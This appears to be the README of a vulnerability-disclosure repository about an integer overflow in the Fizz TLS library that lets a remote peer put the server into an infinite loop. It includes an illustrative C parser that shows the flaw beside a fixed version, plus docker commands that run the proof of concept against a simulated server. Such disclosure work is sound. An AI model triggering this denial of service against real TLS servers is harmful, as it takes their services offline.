Fizz contains a remotely triggerable infinite loop, caused by an integer overflow in this compound assignment. For more details about the bug, see this blog post.
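To make the bug class concrete, here is an added, self-contained C illustration (not Fizz's code, and not the PoC from this repository): a hypothetical record parser whose cursor and "bytes needed" arithmetic live in a uint16_t, beside a hardened version that does the arithmetic in size_t and caps the body length. The framing (a 5-byte header, a 16384-byte body cap) and both sample buffers are constructed for this example. With the wrapping input, the narrow parser's compound assignment wraps to the starting offset, the completeness check passes, and the loop never advances; the checked parser rejects the same input outright.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical record framing, TLS-like: type(1) version(2) length(2) body(length). */
#define HEADER_LEN 5
#define MAX_BODY_LEN 16384  /* assumed protocol cap on one record's body */

static uint16_t read_be16(const uint8_t *p) {
    return (uint16_t)((p[0] << 8) | p[1]);
}

/* Constructed sample inputs. */
static const uint8_t kTwoRecords[] = {
    0x16, 0x03, 0x03, 0x00, 0x02, 0xAA, 0xBB,   /* record 1: body of 2 bytes */
    0x17, 0x03, 0x03, 0x00, 0x01, 0xCC          /* record 2: body of 1 byte */
};
/* A single header whose claimed body length makes HEADER_LEN + length == 65536. */
static const uint8_t kWrapRecord[] = { 0x16, 0x03, 0x03, 0xFF, 0xFB };

/* Pattern with the defect: the cursor and the "bytes needed" computation
 * are uint16_t, so the compound assignment wraps modulo 65536. The
 * completeness check then passes and the cursor lands back where it started.
 * Returns the number of complete records, or -1 if the loop would never
 * terminate (bounded here by max_steps so the demo itself can finish). */
int count_records_narrow(const uint8_t *buf, size_t buf_len, int max_steps) {
    uint16_t offset = 0;
    int records = 0;
    while ((size_t)offset + HEADER_LEN <= buf_len) {
        uint16_t body_len = read_be16(buf + offset + 3);
        uint16_t needed = offset;
        needed += HEADER_LEN + body_len;      /* 16-bit wrap: 0 + 5 + 65531 -> 0 */
        if (needed > buf_len)
            return records;                   /* incomplete record: wait for more data */
        offset = needed;                      /* no progress when the sum wrapped */
        if (++records > max_steps)
            return -1;                        /* would spin forever */
    }
    return records;
}

/* Hardened version: arithmetic in size_t, an explicit protocol cap on the
 * body length, and a bounds check phrased as a subtraction that cannot
 * overflow. Returns the record count, or -2 when a record violates the cap. */
int count_records_checked(const uint8_t *buf, size_t buf_len) {
    size_t offset = 0;
    int records = 0;
    while (buf_len - offset >= HEADER_LEN) {
        size_t body_len = read_be16(buf + offset + 3);
        if (body_len > MAX_BODY_LEN)
            return -2;                        /* reject; do not wait for more data */
        if (body_len > buf_len - offset - HEADER_LEN)
            return records;                   /* genuinely incomplete */
        offset += HEADER_LEN + body_len;      /* strictly increases by >= HEADER_LEN */
        records++;
    }
    return records;
}

int main(void) {
    printf("narrow,  valid input:    %d\n", count_records_narrow(kTwoRecords, sizeof kTwoRecords, 1000));
    printf("narrow,  wrapping input: %d\n", count_records_narrow(kWrapRecord, sizeof kWrapRecord, 1000));
    printf("checked, valid input:    %d\n", count_records_checked(kTwoRecords, sizeof kTwoRecords));
    printf("checked, wrapping input: %d\n", count_records_checked(kWrapRecord, sizeof kWrapRecord));
    return 0;
}
```

The two fixes that matter are independent: widening the arithmetic removes the wrap, and the explicit cap turns an absurd length into a parse error instead of a "wait for more bytes" condition, so a peer cannot keep the parser spinning or stalled by lying about record sizes.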
The scenario for the demo is that there are two computers, named "fizz-server" and "fizz-attacker". The attacker sends a malicious message which triggers an infinite loop on the server. The demo uses docker to simulate the two computers; instructions follow.
Create a docker network bridge to simulate a network with two separate computers:
docker network create -d bridge --subnet 172.18.0.0/16 fizz-demo-network
Build the server docker image:
docker build server -t fizz-server --build-arg UID=`id -u`
Start the container:
docker run --rm --network fizz-demo-network --ip=172.18.0.10 -i -t fizz-server
If you want to be able to debug the fizz server, then you need to start the container with some extra command line arguments:
docker run --rm --network fizz-demo-network --ip=172.18.0.10 --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -i -t fizz-server
Inside the container, run this script to create some certs:
cd ~/certs
./create-certs.sh
Start the server:
~/fizz/build_/bin/fizz server -accept 1443 -cert ~/certs/server-cert.pem -key ~/certs/server-key.pem
Note: TLS servers normally listen on port 443 rather than 1443, but root privileges are required to listen on 443, so if you want to use port 443 you need to run the above command with sudo. The sudo password in this docker container is "x".
Build the attacker docker image:
docker build attacker -t fizz-attacker --build-arg UID=`id -u`
Start the container:
docker run --rm --network fizz-demo-network --ip=172.18.0.11 -i -t fizz-attacker
Send the malicious message to the server:
./poc/poc 172.18.0.10 1443
The source code for the PoC can be found in poc.c.
The original PoC, which I sent to Facebook when I first reported the vulnerability, is far less polished than poc.c above, but it may be of interest because it shows how I tweaked the Fizz client to send the malicious message. The changes I made can be found in diff.txt. (These changes were already applied during the docker build step above.) You can run this version of the PoC like this:
~/fizz/build_/bin/fizz client -connect 172.18.0.10:1443
This command will not return, because it is waiting for a response from the server that will never come. You can just ctrl-C it; the server will continue to be stuck in an infinite loop.